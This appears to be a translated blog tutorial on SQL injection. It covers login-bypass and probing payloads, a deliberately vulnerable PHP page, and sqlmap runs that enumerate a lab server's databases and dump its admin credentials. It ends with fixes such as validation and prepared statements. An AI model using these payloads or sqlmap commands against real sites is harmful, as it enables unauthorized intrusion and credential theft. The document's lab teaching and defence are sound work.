There is a tool called sqlmap whose job is to find SQL injection vulnerabilities and exploit them. This post is a tutorial on how to use it.
Because SQL injection against systems you do not own is illegal, I test against two virtual machines of my own. Please do not break into other people's websites. (SQL injection is much rarer on maintained sites today, and the fix is simple.)

1. What is a SQL injection vulnerability

To understand SQL injection you first need to understand SQL statements. SQL (Structured Query Language) is the language used to query and manipulate databases. Databases commonly found on servers include Microsoft Access, MySQL and PostgreSQL; I use MySQL here. Some query examples follow.
SELECT * FROM admin WHERE user = "test" AND pass = "123456";
This statement looks in the admin table for records whose user is "test" and whose pass is "123456" and returns the matches; a login page typically runs a query of this shape. (MySQL accepts double quotes as string delimiters unless the ANSI_QUOTES mode is enabled, which is why the payloads below use them.)
But if I enter the username test and the password " OR "1"="1, the SQL statement becomes
SELECT * FROM admin WHERE user = "test" AND pass = "" OR "1"="1";
AND binds tighter than OR, so the WHERE clause is parsed as (user = "test" AND pass = "") OR "1"="1", which is true for every row. MySQL returns every record in the table, and the site, which expected at most one row for a valid login, treats this as a successful login. The account you end up in is whichever row the application reads first (often the first administrator), not necessarily test.
If the site also has an administrator flag, try the password " OR "1"="1" AND writable = TRUE AND ""=", so that the query becomes
SELECT * FROM admin WHERE user = "test" AND pass = "" OR "1"="1" AND writable = TRUE AND ""="";
By the same precedence rule this is (user = "test" AND pass = "") OR ("1"="1" AND writable = TRUE AND ""=""). The left side is false, because the password is empty, and the right side reduces to writable = TRUE,
so MySQL returns exactly the records with writable set to true. The trailing ""=" in the payload is only there to absorb the closing quote that the application appends.
Another pattern is viewing an article, which is usually selected through a GET parameter id:
SELECT * FROM articles WHERE id = 1;
If the site does not validate id, test with id=1 AND 1=1, which gives
SELECT * FROM articles WHERE id = 1 AND 1=1;
If the page renders the same article with no error, injection may be possible. Change it to id=1 AND 1=2; if the page now says the article was not found, that is stronger evidence, because the appended condition changed the result. Finally change it to id=" (a lone double quote). If MySQL reports a syntax error, and most sites display it, the parameter is almost certainly injectable.
This is the example I will inject.
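To make the mechanics above concrete, here is an added example (mine, not code from the original post) that reproduces the login bypass and the three-step id probe against an in-memory SQLite database, so it runs offline. The `admin` and `articles` rows are constructed sample data, and the `writable` column stands in for the admin flag. SQLite reserves double quotes for identifiers, so the string literals and payloads use single quotes where the post's MySQL payloads use double quotes; the precedence argument and the results are the same.

```python
import sqlite3

# Constructed sample data (not from the post) standing in for its `admin`
# and `articles` tables. `writable` plays the role of the admin flag in section 1.
SCHEMA = """
CREATE TABLE admin (id INTEGER PRIMARY KEY, user TEXT, pass TEXT, writable INTEGER);
INSERT INTO admin VALUES (1, 'root', 's3cret', 1);
INSERT INTO admin VALUES (2, 'test', '123456', 0);
CREATE TABLE articles (id INTEGER PRIMARY KEY, content TEXT);
INSERT INTO articles VALUES (1, 'first article');
INSERT INTO articles VALUES (2, 'second article');
"""


def make_db():
    """Fresh in-memory database holding the sample tables."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def vulnerable_login(conn, user, password):
    """The login query from section 1, built by string concatenation.
    Returns the usernames of every matching row: a correct login yields one,
    an injected OR yields several, and an application would take the first."""
    sql = (
        "SELECT user FROM admin WHERE user = '" + user
        + "' AND pass = '" + password + "' ORDER BY id"
    )
    return [row[0] for row in conn.execute(sql)]


def vulnerable_article(conn, raw_id):
    """The query from article.php: $sql = 'SELECT ... WHERE id = ' . $_GET['id'].
    Returns the matching contents, or the driver's error text when the injected
    value breaks the statement (the id=" probe from section 1)."""
    sql = "SELECT content FROM articles WHERE id = " + raw_id
    try:
        return [row[0] for row in conn.execute(sql)]
    except sqlite3.Error as exc:
        return "SQL error: " + str(exc)


def manual_probe(conn, good_id="1"):
    """The three-step check from section 1, automated:
    1. id AND 1=1 returns the same article as id alone,
    2. id AND 1=2 returns nothing,
    3. a lone double quote produces a database error.
    All three together are the signal that id reaches the SQL parser."""
    base = vulnerable_article(conn, good_id)
    step0 = base != []  # the reference request must itself return an article
    step1 = vulnerable_article(conn, good_id + " AND 1=1") == base
    step2 = vulnerable_article(conn, good_id + " AND 1=2") == []
    step3 = isinstance(vulnerable_article(conn, '"'), str)
    return step0 and step1 and step2 and step3


if __name__ == "__main__":
    db = make_db()
    print(vulnerable_login(db, "test", "' OR '1'='1"))
    print(vulnerable_login(db, "test", "' OR '1'='1' AND writable = 1 AND ''='"))
    print(manual_probe(db))
```

Note that the plain `OR '1'='1` bypass returns both accounts, with `root` first, which is why the login lands in whatever account the application reads first rather than in `test`; the `writable` variant narrows the result to the flagged account only.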

2. Setting up the environment

I use Kali Linux 2017.3 as the attacker and Ubuntu 18.04 LTS as the victim server. Set up the server first (see my post "Ubuntu18.04 如何搭建Apache2+php5.6+mysql服务器", on building an Apache2 + PHP 5.6 + MySQL server on Ubuntu 18.04; the mysql_* functions used below were removed in PHP 7, which is why the lab pins PHP 5.6). The injectable page lives at /article.php, with the following code.

<?php
if (!isset($_GET['id'])) {
    echo 'Parameter id is not set';
    die(1);
}
$host = 'localhost';
$user = 'test';
$pass = '123456';
$conn = mysql_connect($host, $user, $pass);
if (!$conn) {
    die('Could not connect to the database');
}
// The vulnerability is here: the raw GET parameter is concatenated into the SQL text,
// so anything the client sends after the number is parsed as SQL.
$sql = 'SELECT * FROM website.articles WHERE id = ' . $_GET['id'];
$query = mysql_query($sql, $conn);
$row = mysql_fetch_array($query);
if (!$row) {
    echo 'The requested article does not exist';
} else {
    echo $row['content'];
}
mysql_close($conn);
?>

Once the site is up, this is what the database looks like in MySQL:

[Screenshot: the website database with its admin and articles tables; not reproduced]

Of course, I am not injecting just to read those few articles, which I can see through the page anyway. The goal is to reach data I should not be able to see, such as the accounts and passwords in the admin table.

3. Testing before injection

The server address is 192.168.3.59. First open the page normally to check whether it can be injected.

[Screenshot: article.php?id=1 renders the article normally; not reproduced]

The page itself is clearly fine. Now test with id=".

[Screenshot: the same page with id=" shows no article; not reproduced]

MySQL rejects the statement with a syntax error, so the query returns nothing.

This matches the prediction from section 1 exactly, so the page can be injected.

4. Injecting with sqlmap

On Kali Linux, sqlmap is installed by default.
On Ubuntu, install it with apt install sqlmap.
On other systems, download the source from the official site; sqlmap is written in Python, so you may need to install Python as well.
Now the injection.
sqlmap -u '192.168.3.59/article.php?id=1'. The GET parameter must be included in the URL, otherwise sqlmap does not know which parameter to inject. The output looks roughly like this:

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1'
        ___
       __H__
 ___ ___[,]_____ ___ ___  {1.1.11#stable}
|_ -| . [.]     | .'| . |
|___|_  [(]_|_|_|__,|  _|
      |_|V          |_|   http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 11:30:43

[11:30:43] [INFO] resuming back-end DBMS 'mysql'
[11:30:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=1 AND 1817=1817

    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind
    Payload: id=1 AND SLEEP(5)

    Type: UNION query
    Title: Generic UNION query (NULL) - 2 columns
    Payload: id=-2184 UNION ALL SELECT NULL,CONCAT(0x716b707071,0x517964767671746351415543654b4b794171664b78754b57434b70774c6b56434b6a46786a4d5a76,0x717a706271)-- BgjA
---
[11:30:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:30:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:30:43

The output shows three working injection techniques for id (boolean-based blind, time-based blind and UNION), so the parameter is injectable. The "resuming" and "resumed ... from stored session" lines mean sqlmap is reusing results it cached under /root/.sqlmap/output from an earlier run against this target; on a first run you would see the detection tests themselves. Now the actual extraction.
sqlmap -u '192.168.3.59/article.php?id=1' --dbs, whose output is

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' --dbs
[sqlmap banner and legal disclaimer omitted; identical to the first run]

[*] starting at 11:37:43

[11:37:43] [INFO] resuming back-end DBMS 'mysql'
[11:37:43] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    [same three injection points as in the first run]
---
[11:37:43] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:37:43] [INFO] fetching database names
[11:37:43] [INFO] the SQL query used returns 2 entries
[11:37:43] [INFO] retrieved: information_schema
[11:37:43] [INFO] retrieved: website
available databases [2]:
[*] information_schema
[*] website

[11:37:43] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:37:43

The injection reveals two databases, information_schema and website.
information_schema only holds MySQL's own metadata about databases, tables and columns (it is what sqlmap reads to enumerate the rest), so there is nothing of interest in it; website holds the site's data, so that is the one to go after.
sqlmap -u '192.168.3.59/article.php?id=1' -D website --tables, whose output is

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website --tables
[sqlmap banner and legal disclaimer omitted; identical to the first run]

[*] starting at 11:41:14

[11:41:14] [INFO] resuming back-end DBMS 'mysql'
[11:41:14] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    [same three injection points as in the first run]
---
[11:41:14] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:41:14] [INFO] fetching tables for database: 'website'
[11:41:14] [INFO] the SQL query used returns 2 entries
[11:41:14] [INFO] retrieved: admin
[11:41:14] [INFO] retrieved: articles
Database: website
[2 tables]
+----------+
| admin    |
| articles |
+----------+

[11:41:14] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:41:14

There are two tables, admin and articles; an attacker will naturally target admin.
sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin --columns, whose output is

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin --columns
[sqlmap banner and legal disclaimer omitted; identical to the first run]

[*] starting at 11:43:46

[11:43:46] [INFO] resuming back-end DBMS 'mysql'
[11:43:46] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    [same three injection points as in the first run]
---
[11:43:46] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:43:46] [INFO] fetching columns for table 'admin' in database 'website'
[11:43:47] [INFO] the SQL query used returns 3 entries
[11:43:47] [INFO] retrieved: "id","int(11)"
[11:43:47] [INFO] retrieved: "user","text"
[11:43:47] [INFO] retrieved: "pass","text"
Database: website
Table: admin
[3 columns]
+--------+---------+
| Column | Type    |
+--------+---------+
| user   | text    |
| id     | int(11) |
| pass   | text    |
+--------+---------+

[11:43:47] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:43:47

The injection returns three columns: user, id and pass. The user and pass columns are all we need for the credentials (usually the login for the site's admin backend).
sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin -C user,pass --dump, whose output is

root@kali:~# sqlmap -u '192.168.3.59/article.php?id=1' -D website -T admin -C user,pass --dump
[sqlmap banner and legal disclaimer omitted; identical to the first run]

[*] starting at 11:47:33

[11:47:33] [INFO] resuming back-end DBMS 'mysql'
[11:47:33] [INFO] testing connection to the target URL
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: id (GET)
    [same three injection points as in the first run]
---
[11:47:33] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.29
back-end DBMS: MySQL >= 5.0.12
[11:47:33] [INFO] fetching entries of column(s) '`user`, pass' for table 'admin' in database 'website'
[11:47:33] [INFO] the SQL query used returns 3 entries
[11:47:33] [INFO] retrieved: "test1","123456"
[11:47:33] [INFO] retrieved: "test2","123456"
[11:47:33] [INFO] retrieved: "test3","123456"
Database: website
Table: admin
[3 entries]
+--------+--------+
| user   | pass   |
+--------+--------+
| test1  | 123456 |
| test2  | 123456 |
| test3  | 123456 |
+--------+--------+

[11:47:33] [INFO] table 'website.admin' dumped to CSV file '/root/.sqlmap/output/192.168.3.59/dump/website/admin.csv'
[11:47:33] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.3.59'

[*] shutting down at 11:47:33

We have the administrator accounts and passwords, and the injection is complete. (This lab stores passwords in plaintext; a real site would normally store hashes, which would still have to be cracked before they could be used.)

5. How to fix the SQL injection vulnerability

Take my own page as the example. Before the fix, article.php is exactly the code shown in section 2, and the vulnerable line is

$sql = 'SELECT * FROM website.articles WHERE id = ' . $_GET['id'];

The root cause is not the special characters themselves but that the request parameter is pasted into the SQL text and then parsed as SQL. There are several ways to fix this.

  • Validate the parameter. Here id must be a positive integer, so cast it (intval) or reject anything that is not all digits before it gets anywhere near the query.
  • Escape strings where quotes are unavoidable; in PHP, addslashes or, better, mysql_real_escape_string. Note that escaping only protects values that sit inside quotes in the query. On this page id is unquoted, so the probe 1 AND 1=2 contains nothing to escape and addslashes would pass it through unchanged. The robust form is a prepared statement (mysqli or PDO with bound parameters), where the value is sent separately from the SQL text and can never change the statement's structure.
  • Install a ready-made product; many sites run something like D盾 (D Shield). These are web application firewalls that block requests that look like injection attempts. They reduce exposure, but they sit in front of the bug rather than fixing it.
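As an added example (not the post's code) of the first two fixes applied to article.php's query, the following Python mirrors the PHP logic against an in-memory SQLite table with constructed sample rows. It shows that addslashes-style escaping leaves the unquoted `1 AND 1=2` probe untouched, and implements the robust alternative: integer validation plus a bound parameter. The PHP equivalents (ctype_digit/intval, PDO::prepare with PDO::PARAM_INT) are noted in the comments.

```python
import sqlite3

# Constructed sample table (not from the post) mirroring `website.articles`.
SCHEMA = """
CREATE TABLE articles (id INTEGER PRIMARY KEY, content TEXT);
INSERT INTO articles VALUES (1, 'first article');
INSERT INTO articles VALUES (2, 'second article');
"""


def make_db():
    """Fresh in-memory database holding the sample table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn


def parse_article_id(raw):
    """Fix 1 from the list: accept only a plain ASCII decimal integer greater
    than zero and return it as an int. str.isdigit() on its own also accepts
    non-ASCII digits, so the ASCII check is explicit.
    PHP equivalent: ctype_digit($id) followed by (int)$id."""
    if not isinstance(raw, str) or not raw.isascii() or not raw.isdigit():
        return None
    value = int(raw)
    return value if value > 0 else None


def escaped_lookup(conn, raw_id):
    """Fix 2 from the list applied to this page, to show why it is not enough
    here: addslashes()-style escaping of quotes and backslashes. Because id is
    not inside quotes in the query, the probe `1 AND 1=2` contains nothing to
    escape and reaches the SQL parser unchanged."""
    escaped = (
        raw_id.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')
    )
    sql = "SELECT content FROM articles WHERE id = " + escaped
    return [row[0] for row in conn.execute(sql)]


def safe_article(conn, raw_id):
    """Hardened lookup: validate, then bind. The SQL text is a constant and the
    value travels to the engine as a parameter, so no input can alter the
    statement's structure. PHP equivalent: PDO::prepare() followed by
    bindValue(1, $id, PDO::PARAM_INT).
    Returns the content, or None for a missing article or a rejected id."""
    article_id = parse_article_id(raw_id)
    if article_id is None:
        return None
    row = conn.execute(
        "SELECT content FROM articles WHERE id = ?", (article_id,)
    ).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    db = make_db()
    print(escaped_lookup(db, "1 AND 1=2"))   # escaping did nothing: probe still ran
    print(safe_article(db, "1 AND 1=2"))     # rejected before any SQL is built
    print(safe_article(db, "1"))
```

The validation step alone would already stop every payload shown in this post, because none of them is a bare integer; the bound parameter is the defence that survives when a future edit puts a genuinely free-form string into the query.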

6. In practice

In practice SQL injection is rarely this smooth. Sometimes table names have to be guessed with a wordlist (Kali ships several; sqlmap's --common-tables does this, and it is needed when the DBMS offers no information_schema, as with MySQL before 5.0 or Microsoft Access). Sometimes the injection fails outright (perhaps because the wordlist is not good enough), and even with a password in hand you may not find the login page (usually under an admin or login directory). This post only shows the method and cannot guarantee success; I hope it is useful.
